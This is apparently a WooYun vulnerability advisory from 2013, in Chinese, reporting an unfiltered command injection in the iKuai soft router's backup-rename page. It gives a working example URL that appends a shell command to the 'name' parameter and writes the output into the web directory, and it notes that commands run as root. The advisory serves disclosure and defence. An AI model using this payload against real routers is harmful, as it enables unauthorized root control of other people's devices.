漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040137
漏洞标题:爱快软路由任意命令执行漏洞一枚(非st2)
相关厂商:爱快免费流控路由
漏洞作者: LinE
提交时间:2013-10-18 09:14
修复时间:2014-01-16 09:15
公开时间:2014-01-16 09:15
漏洞类型:命令执行
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-21: 细节向第三方安全合作伙伴开放
2013-12-12: 细节向核心白帽子及相关领域专家公开
2013-12-22: 细节向普通白帽子公开
2014-01-01: 细节向实习白帽子公开
2014-01-16: 细节向公众公开
简要描述:
爱快软路由任意命令执行一枚,可执行任意命令
详细说明:
首先进入后台,在系统设置---升级/备份当中,点击文件名即可进行备份改名
在此处修改之前开启抓包工具,改名过程抓包,获得了改名的接口
old_name和name
http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak
由于此处未做任何过滤,可以在url之后加入;+命令导致了该漏洞的触发
因为命令执行了之后并不会在此处做返回结果,所以需要把返回的结果重定向到WEB目录下
/tmp/ikuai/www/cgi-bin
于是打开例如
http://192.168.20.100/cgi-bin/backupsAdd.php?old_name=2013-10-17-234141.bak&name=2013-10-17-234141.bak;ls%20-l>/tmp/ikuai/www/cgi-bin/1.txt
这个url即可获取当前目录下文件列表
查看用户的时候我惊呆了
root有木有,可以干坏事有木有.....
GetShell在这里已经不重要了....有了非交互的shell,交互的还会远么......
漏洞证明:
修复方案:
这个你们看着办吧
版权声明:转载请注明来源 LinE@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-10-18 15:55
厂商回复:
感谢白帽子兄弟帮忙找出漏洞,也希望更多的白帽子可以帮忙检测我们的产品,我们对安全态度的开放是令人发指的,我们认为安全是最重要的,白帽子同志们的检测是很给力的(但还请不要公开漏洞细节,会对我们造成损失,多谢)请挖到这个漏洞的兄弟联系QQ领取奖品:1808663661
最新状态:
暂无